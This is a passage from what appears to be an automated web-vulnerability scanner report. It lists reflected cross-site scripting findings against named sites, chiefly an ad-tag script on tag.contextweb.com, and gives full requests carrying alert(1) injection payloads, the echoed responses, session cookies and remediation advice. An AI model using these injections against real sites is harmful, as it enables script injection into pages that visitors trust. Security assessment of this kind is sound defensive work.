Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rsi_segs=D08734_70008|D08734_72078; GCIONSN=AAAAOn52dzoxfnVidDox; s_cc=true; s_sq=%5B%5BB%5D%5D; gban=inter%3Ddisabled%3Atrue%2Cviews%3A1%2Cexpiry%3A16H%2Cplacementid%3A1273145%2Cpreload%3Afalse%2Cid%3Ainter%2Ccontrolurl%3Ahttp%253A//gannett.gcion.com/addyn/3.0/5111.1/1273144/0/0/ADTECH%253Balias%253Dfl-brevard.flatoday.com/news/article.htm_Interstitial%253Bcookie%253Dinfo%253Bloc%253D100%253Btarget%253D_blank%253Bgrp%253D24711%253Bmisc%253D1304949586599%253Bsize%253D0%253Bnoperf%253D1%2Cexpires%3A1305007188; digtriadprod=R4278572220

Response

HTTP/1.1 200 OK
Set-Cookie: digtriadprod=R4278572220; path=/
Cache-Control: public, must-revalidate
Content-Type: application/x-javascript; charset=utf-8
Expires: Mon, 09 May 2011 14:01:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: l3vm210l3pluckcom
Set-Cookie: SiteLifeHost=l3vm210l3pluckcom; domain=floridatoday.com; path=/
Set-Cookie: anonId=23ef99e6-27a2-49a5-8051-e7ec0f9a803b; domain=floridatoday.com; expires=Tue, 08-May-2012 14:01:18 GMT; path=/
Date: Mon, 09 May 2011 14:01:18 GMT
Content-Length: 3076

PluckSDKjpcb({
"Envelopes": [
{
"PayloadType": "Responses.External.ArticleResponse",
"Payload": "{\r\n \"Article\": {\r\n \"ArticleKey\": {\r\n \"Key\": \"20110508.flori
...[SNIP]...
al.ArticleResponse\",\r\n \"ResponseStatus\": {\r\n \"StatusCode\": \"OK\",\r\n \"Exceptions\": [],\r\n \"ObjectType\": \"Models.System.ResponseStatus\"\r\n }\r\n}"
}
]
},'request_081cf3<script>alert(1)</script>472e56e0cef');
3.71. http://static.nme.com/themes/default/static_images//themes/default/images/footer_bkgrd.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://static.nme.com
Path:   /themes/default/static_images//themes/default/images/footer_bkgrd.gif

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 16820-->8bd07968a3a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /themes16820-->8bd07968a3a/default/static_images//themes/default/images/footer_bkgrd.gif HTTP/1.1
Host: static.nme.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=29jkomkf8kicpicajt2rkq4nq6; ignite_loggedin=false; browsertype=web; s_cc=true; s_sq=%5B%5BB%5D%5D; __utmz=112756251.1304949643.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=112756251.356327229.1304949643.1304949643.1304949643.1; __utmc=112756251; __utmb=112756251.2.10.1304949643; rsi_segs=

Response

HTTP/1.1 404 Not Found
Server: Apache
Pragma: no-cache
NmeAkamaiMatch: 1
IgniteAkamaiMatch: 1
X-Wf-Protocol-1: http://meta.wildfirehq.org/Protocol/JsonStream/0.2
X-Wf-1-Plugin-1: http://meta.firephp.org/Wildfire/Plugin/FirePHP/Library-FirePHPCore/0.3
X-Wf-1-Structure-1: http://meta.firephp.org/Wildfire/Structure/FirePHP/FirebugConsole/0.1
X-Wf-1-1-1-1: 55|[{"Type":"LOG"},"now: Mon, 09 May 2011 15:03:14 +0100"]|
X-Wf-1-1-1-2: 63|[{"Type":"LOG"},"id: 5eeb5799cec8cc65da155e0eb1098290cdcddc27"]|
X-Wf-1-1-1-3: 23|[{"Type":"LOG"},"li: "]|
X-Wf-1-1-1-4: 24|[{"Type":"LOG"},"cs: 1"]|
X-Wf-1-1-1-5: 23|[{"Type":"LOG"},"rc: "]|
X-Wf-1-1-1-6: 23|[{"Type":"LOG"},"ic: "]|
X-Wf-1-1-1-7: 28|[{"Type":"LOG"},"ttl: 3760"]|
X-Wf-1-1-1-8: 30|[{"Type":"LOG"},"mu: 4456448"]|
X-Wf-1-1-1-9: 38|[{"Type":"LOG"},"ts: 0.1827130317688"]|
X-Wf-1-1-1-10: 23|[{"Type":"LOG"},"ct: "]|
Content-Type: text/html
Cache-Control: must-revalidate, max-age=2591999, post-check=0, pre-check=0
Expires: Wed, 08 Jun 2011 14:03:14 GMT
Date: Mon, 09 May 2011 14:03:15 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 38325

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>

<title>NME.COM<
...[SNIP]...
<!-- error: EXCEPTION_NO_CONTROLLER - Invalid controller specified (themes16820-->8bd07968a3a) -->
...[SNIP]...
3.72. http://tag.contextweb.com/TagPublish/getjs.aspx [action parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the action request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9e4eb"%3balert(1)//5e3e6b7f4d2 was submitted in the action parameter. This input was echoed as 9e4eb";alert(1)//5e3e6b7f4d2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD9e4eb"%3balert(1)//5e3e6b7f4d2&cwrun=200&cwadformat=728X90&cwpid=536156&cwwidth=728&cwheight=90&cwpnet=1&cwtagid=101378 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|530739.4dab7d35-b1d2-915a-d3c0-9d57f9c66b07.0|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; cr=2|1|-8588966416881931568|1; FC1-WC=^53620_1_2QLwy; V=wOebwAz4UvVv; cwbh1=541%3B05%2F24%2F2011%3BLIFL1%0A1697%3B05%2F24%2F2011%3BFCRT1%0A2354%3B05%2F24%2F2011%3BZETC1%0A2532%3B05%2F26%2F2011%3BAMQU2%0A1443%3B05%2F30%2F2011%3BNETM7%0A2250%3B06%2F06%2F2011%3BEXPD1

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP118
Cache-Control: max-age=10000, public, must-revalidate
Last-Modified: Fri, 06 May 02011 16:58:30 EDT
Content-Type: application/x-javascript;charset=ISO-8859-1
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 5918
Date: Mon, 09 May 2011 14:00:11 GMT
Connection: close
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Mon, 09-May-2011 16:46:51 GMT; Path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="536156";var cwtagid="101378";var cwadformat="728X90";var ca="VIEWAD9e4eb";alert(1)//5e3e6b7f4d2";var cr="200";var cw="728";var ch="90";var cads="0";var cp="536156";var ct="101378";var cf="728X90";var cn="1";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase()
...[SNIP]...
3.73. http://tag.contextweb.com/TagPublish/getjs.aspx [cwadformat parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwadformat request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff8b7"%3balert(1)//c29357cb3b5 was submitted in the cwadformat parameter. This input was echoed as ff8b7";alert(1)//c29357cb3b5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=728X90ff8b7"%3balert(1)//c29357cb3b5&cwpid=536156&cwwidth=728&cwheight=90&cwpnet=1&cwtagid=101378 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|530739.4dab7d35-b1d2-915a-d3c0-9d57f9c66b07.0|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; cr=2|1|-8588966416881931568|1; FC1-WC=^53620_1_2QLwy; V=wOebwAz4UvVv; cwbh1=541%3B05%2F24%2F2011%3BLIFL1%0A1697%3B05%2F24%2F2011%3BFCRT1%0A2354%3B05%2F24%2F2011%3BZETC1%0A2532%3B05%2F26%2F2011%3BAMQU2%0A1443%3B05%2F30%2F2011%3BNETM7%0A2250%3B06%2F06%2F2011%3BEXPD1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB26
Cache-Control: public, must-revalidate, max-age=1000
Last-Modified: Wed, 04 May 2011 15:16:23 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5832
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Mon, 09 May 2011 14:00:14 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/getad.aspx";var cp="536156";var ct="101378";var cf="728X90ff8b7";alert(1)//c29357cb3b5";var ca="VIEWAD";var cr="200";var cw="728";var ch="90";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1];var _
...[SNIP]...
3.74. http://tag.contextweb.com/TagPublish/getjs.aspx [cwheight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwheight request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3593"%3balert(1)//afb37673b17 was submitted in the cwheight parameter. This input was echoed as e3593";alert(1)//afb37673b17 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=728X90&cwpid=536156&cwwidth=728&cwheight=90e3593"%3balert(1)//afb37673b17&cwpnet=1&cwtagid=101378 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|530739.4dab7d35-b1d2-915a-d3c0-9d57f9c66b07.0|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; cr=2|1|-8588966416881931568|1; FC1-WC=^53620_1_2QLwy; V=wOebwAz4UvVv; cwbh1=541%3B05%2F24%2F2011%3BLIFL1%0A1697%3B05%2F24%2F2011%3BFCRT1%0A2354%3B05%2F24%2F2011%3BZETC1%0A2532%3B05%2F26%2F2011%3BAMQU2%0A1443%3B05%2F30%2F2011%3BNETM7%0A2250%3B06%2F06%2F2011%3BEXPD1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB24
Cache-Control: public, must-revalidate, max-age=1000
Last-Modified: Wed, 04 May 2011 15:16:23 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5832
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Mon, 09 May 2011 14:00:15 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/getad.aspx";var cp="536156";var ct="101378";var cf="728X90";var ca="VIEWAD";var cr="200";var cw="728";var ch="90e3593";alert(1)//afb37673b17";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1];var _cwd=document;var _cww=window;var _cwu="undefined";var
...[SNIP]...
3.75. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwpid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d35e5"%3balert(1)//a722bf372ca was submitted in the cwpid parameter. This input was echoed as d35e5";alert(1)//a722bf372ca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=728X90&cwpid=536156d35e5"%3balert(1)//a722bf372ca&cwwidth=728&cwheight=90&cwpnet=1&cwtagid=101378 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|530739.4dab7d35-b1d2-915a-d3c0-9d57f9c66b07.0|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; cr=2|1|-8588966416881931568|1; FC1-WC=^53620_1_2QLwy; V=wOebwAz4UvVv; cwbh1=541%3B05%2F24%2F2011%3BLIFL1%0A1697%3B05%2F24%2F2011%3BFCRT1%0A2354%3B05%2F24%2F2011%3BZETC1%0A2532%3B05%2F26%2F2011%3BAMQU2%0A1443%3B05%2F30%2F2011%3BNETM7%0A2250%3B06%2F06%2F2011%3BEXPD1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB26
Cache-Control: public, must-revalidate, max-age=1000
Last-Modified: Wed, 04 May 2011 15:16:23 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5832
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Mon, 09 May 2011 14:00:14 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/getad.aspx";var cp="536156d35e5";alert(1)//a722bf372ca";var ct="101378";var cf="728X90";var ca="VIEWAD";var cr="200";var cw="728";var ch="90";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase()
...[SNIP]...
3.76. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpnet parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwpnet request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f670"%3balert(1)//bf6a463a257 was submitted in the cwpnet parameter. This input was echoed as 2f670";alert(1)//bf6a463a257 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=728X90&cwpid=536156&cwwidth=728&cwheight=90&cwpnet=12f670"%3balert(1)//bf6a463a257&cwtagid=101378 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|530739.4dab7d35-b1d2-915a-d3c0-9d57f9c66b07.0|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; cr=2|1|-8588966416881931568|1; FC1-WC=^53620_1_2QLwy; V=wOebwAz4UvVv; cwbh1=541%3B05%2F24%2F2011%3BLIFL1%0A1697%3B05%2F24%2F2011%3BFCRT1%0A2354%3B05%2F24%2F2011%3BZETC1%0A2532%3B05%2F26%2F2011%3BAMQU2%0A1443%3B05%2F30%2F2011%3BNETM7%0A2250%3B06%2F06%2F2011%3BEXPD1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB27
Cache-Control: public, must-revalidate, max-age=1000
Last-Modified: Wed, 04 May 2011 15:16:23 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5832
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Mon, 09 May 2011 14:00:15 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/getad.aspx";var cp="536156";var ct="101378";var cf="728X90";var ca="VIEWAD";var cr="200";var cw="728";var ch="90";var cn="12f670";alert(1)//bf6a463a257";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1];var _cwd=document;var _cww=window;var _cwu="undefined";var _cwn=naviga
...[SNIP]...
3.77. http://tag.contextweb.com/TagPublish/getjs.aspx [cwrun parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwrun request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e83ac"%3balert(1)//31573316bfa was submitted in the cwrun parameter. This input was echoed as e83ac";alert(1)//31573316bfa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200e83ac"%3balert(1)//31573316bfa&cwadformat=728X90&cwpid=536156&cwwidth=728&cwheight=90&cwpnet=1&cwtagid=101378 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|530739.4dab7d35-b1d2-915a-d3c0-9d57f9c66b07.0|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; cr=2|1|-8588966416881931568|1; FC1-WC=^53620_1_2QLwy; V=wOebwAz4UvVv; cwbh1=541%3B05%2F24%2F2011%3BLIFL1%0A1697%3B05%2F24%2F2011%3BFCRT1%0A2354%3B05%2F24%2F2011%3BZETC1%0A2532%3B05%2F26%2F2011%3BAMQU2%0A1443%3B05%2F30%2F2011%3BNETM7%0A2250%3B06%2F06%2F2011%3BEXPD1

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish v3
CW-Server: CW-APP203
Cache-Control: max-age=10000, public, must-revalidate
Last-Modified: Fri, 06 May 02011 17:06:12 EDT
Content-Type: application/x-javascript;charset=ISO-8859-1
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 5918
Date: Mon, 09 May 2011 14:00:14 GMT
Connection: close
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Mon, 09-May-2011 16:46:54 GMT; Path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="536156";var cwtagid="101378";var cwadformat="728X90";var ca="VIEWAD";var cr="200e83ac";alert(1)//31573316bfa";var cw="728";var ch="90";var cads="0";var cp="536156";var ct="101378";var cf="728X90";var cn="1";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var
...[SNIP]...
3.78. http://tag.contextweb.com/TagPublish/getjs.aspx [cwtagid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwtagid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 65341"%3balert(1)//c8426144146 was submitted in the cwtagid parameter. This input was echoed as 65341";alert(1)//c8426144146 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=728X90&cwpid=536156&cwwidth=728&cwheight=90&cwpnet=1&cwtagid=10137865341"%3balert(1)//c8426144146 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|530739.4dab7d35-b1d2-915a-d3c0-9d57f9c66b07.0|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; cr=2|1|-8588966416881931568|1; FC1-WC=^53620_1_2QLwy; V=wOebwAz4UvVv; cwbh1=541%3B05%2F24%2F2011%3BLIFL1%0A1697%3B05%2F24%2F2011%3BFCRT1%0A2354%3B05%2F24%2F2011%3BZETC1%0A2532%3B05%2F26%2F2011%3BAMQU2%0A1443%3B05%2F30%2F2011%3BNETM7%0A2250%3B06%2F06%2F2011%3BEXPD1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
CW-Server: CW-WEB20
Cache-Control: public, must-revalidate, max-age=1000
Last-Modified: Wed, 04 May 2011 15:16:23 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5832
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Mon, 09 May 2011 14:00:15 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/getad.aspx";var cp="536156";var ct="10137865341";alert(1)//c8426144146";var cf="728X90";var ca="VIEWAD";var cr="200";var cw="728";var ch="90";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _n
...[SNIP]...
3.79. http://tag.contextweb.com/TagPublish/getjs.aspx [cwwidth parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwwidth request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5e2be"%3balert(1)//bd79ae61eda was submitted in the cwwidth parameter. This input was echoed as 5e2be";alert(1)//bd79ae61eda in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=728X90&cwpid=536156&cwwidth=7285e2be"%3balert(1)//bd79ae61eda&cwheight=90&cwpnet=1&cwtagid=101378 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
